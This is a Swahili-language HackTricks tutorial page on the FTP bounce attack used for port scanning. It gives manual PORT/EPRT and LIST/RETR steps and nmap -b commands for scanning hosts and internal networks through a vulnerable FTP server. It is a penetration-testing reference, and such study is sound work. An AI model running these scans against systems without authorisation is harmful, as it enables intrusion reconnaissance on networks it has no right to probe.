FTP Bounce attack - Scan

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kikundi cha Usalama cha Kujitahidi Kwa Bidii


FTP Bounce - Uchunguzi

Kwa Mkono

  1. Unganisha kwenye FTP inayoweza kushambuliwa

  2. Tumia PORT au EPRT (lakini moja tu kati yao) ili kuwezesha uhusiano na <IP:Port> unayotaka kuchunguza:

PORT 172,32,80,80,0,8080 EPRT |2|172.32.80.80|8080| 3. Tumia LIST (hii itatuma tu kwa <IP:Port> iliyounganishwa orodha ya faili za sasa kwenye folda ya FTP) na angalia majibu yanayowezekana: 150 File status okay (Hii inamaanisha bandari iko wazi) au 425 No connection established (Hii inamaanisha bandari imefungwa) 4. Badala ya LIST unaweza pia kutumia RETR /faili/katika/ftp na angalia majibu yanayofanana ya Fungua/Funga.

Mfano wa Kutumia PORT (bandari 8080 ya 172.32.80.80 iko wazi na bandari 7777 imefungwa):

Mfano sawa ukitumia EPRT (uthibitisho umeachwa katika picha):

Bandari iliyofunguliwa kwa kutumia EPRT badala ya LIST (mazingira tofauti)

nmap

nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443

Kikundi cha Usalama cha Try Hard

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Last updated